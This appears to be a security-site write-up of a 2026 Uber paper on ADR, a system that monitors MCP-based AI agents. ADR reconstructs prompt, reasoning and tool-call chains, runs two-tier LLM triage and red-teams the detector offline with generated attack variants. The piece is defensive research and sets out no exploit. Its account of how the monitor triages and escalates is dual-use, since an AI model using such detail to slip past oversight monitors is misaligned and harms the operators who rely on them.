system: OPERATIONAL
← back to all hacks
DEFENSE MEDIUM NEW

ADR: detection and response for MCP agents, proven at Uber scale

A May 2026 paper from Uber describes a production EDR-style system for MCP agents: full causal telemetry, two-tier detection, and offline red-teaming, running on 7,200+ hosts for ten months.

2026-06-08 // 6 min affects: mcp-agents, claude-code, cursor, cline

What is this?

On May 17, 2026, a team from Uber posted ADR: An Agentic Detection System for Enterprise Agentic AI Security (arXiv:2605.17380, MLSys 2026 poster). It describes what the authors call the first large-scale, production-proven framework for monitoring AI agents that operate through the Model Context Protocol (MCP) — the now-common setup where a host like Cursor, Cline, or Claude Code talks to remote MCP servers exposing file I/O, API calls, and database access.

The motivation is a detection gap most teams will recognize. Conventional endpoint tools (EDR) see outcomes — a file was written, an API was called — but not the agent’s prompts, reasoning, or the causal chain linking an instruction to an action. That makes it impossible to tell a malicious exfiltration apart from a benign config save. ADR’s claim is that agent security needs telemetry built for agents, plus detection cheap enough to run at scale. The code and benchmark are open-sourced on GitHub.

How it works

ADR has three components, each mapped to a familiar SOC role:

Component       Role (SOC analogy)        What it does
--------------  ------------------------  --------------------------------------
ADR Sensor      Visibility / EDR agent    Parses local stores of agentic tools
                                          (Cursor, Cline, Claude Code SQLite /
                                          JSONL caches) to rebuild full sessions:
                                          user prompts, agent reasoning, MCP
                                          tool calls, environmental context
ADR Detector    Tiered triage + analyst   Tier 1: cheap, high-recall LLM triage
                                          ("when in doubt, escalate"); Tier 2:
                                          deep reasoning with enterprise context
                                          + curated threat intel
ADR Explorer    Internal red team         Offline engine that generates and
                                          tests attack variants pre-deployment,
                                          feeding discoveries back into Tier 2

The design principle is causal telemetry, not just outcomes: the Sensor records why something happened (prompt → reasoning → tool execution), closing the observability gap. The two-tier Detector exists because running an LLM over every event at production volume (10,000+ sessions/day) is prohibitively expensive — Tier 1 short-circuits clearly benign activity and only escalates suspicious events to the costlier Tier 2. The offline Explorer continuously discovers “hard examples” and curates them into a threat-intelligence repository, so detection improves before attacks reach production rather than after.

No exploit is reproduced here, and none is needed to understand the architecture; the canonical reference is the paper and its repository.

Why it matters

The distinctive part is that this is not a lab prototype. ADR has run at Uber for over ten months, reaching 7,200+ unique hosts and processing 10,000+ agent sessions per day. In production it surfaced hundreds of credential exposures across 26 categories that had been shared outside the enterprise network, and informed a shift-left prevention layer reporting 97.2% precision (206 detected across 212 unique credentials from hundreds of thousands of sessions).

On the released ADR-Bench (302 tasks — 42 malicious, 260 benign — across 133 MCP servers and 17 attack techniques), ADR reports zero false positives while detecting 67% of attacks, beating three baselines (ALRPHFS, GuardAgent, LlamaFirewall) by 2–4× in F1. The authors deliberately optimize for precision: baseline methods produced up to 40 false positives out of 260 benign tasks, which in an enterprise means 40 expensive, pointless incident-response triggers. That trade-off — catching two-thirds of attacks with no false alarms versus catching more but drowning the SOC — is the practical lesson for anyone deploying agent monitoring.

Defenses

ADR is itself the defense, so the takeaways are about how to instrument and evaluate agent monitoring.

  1. Capture the causal chain, not just outcomes. File-write and API logs can’t distinguish exfiltration from a config save. Reconstruct prompt → reasoning → tool call so behavior is interpretable. The Sensor does this by parsing the agentic tool’s own local caches.
  2. Tier your detection for cost. Running a reasoning LLM on every event doesn’t scale. Use cheap high-recall triage first and reserve expensive context-aware analysis for flagged events.
  3. Red-team offline, continuously. Generate hard attack variants before deployment and feed them back into detection logic, instead of waiting for novel attacks to appear in production.
  4. Treat credential exfiltration as a first-class signal. The deployment’s biggest real-world finding was credentials leaving the network — monitor for it explicitly across many formats.
  5. Optimize precision for production. A guardrail that floods the SOC with false positives won’t survive contact with operations. Report your operating point (recall and false positives), not just a headline detection rate.

Status

ItemReferenceDateNotes
ADR systemarXiv:2605.173802026-05-17Sensor + two-tier Detector + offline Explorer
Production deploymentUber~10 months7,200+ hosts, 10,000+ sessions/day, 97.2% precision
ADR-Bench + codegithub.com/uber/ADR2026-05302 tasks, 133 MCP servers, 17 techniques
Reported resultADR-Bench2026-050 false positives, 67% detection, 2–4× F1 over baselines

The framing to keep is that this is a vendor-internal deployment with self-reported numbers, presented as an MLSys poster rather than an independent evaluation. The durable, transferable point is architectural: MCP agents create an observability gap that conventional EDR doesn’t fill, and closing it requires agent-native telemetry, cost-aware tiered detection, and a feedback loop that red-teams the detector before attackers do.

Sources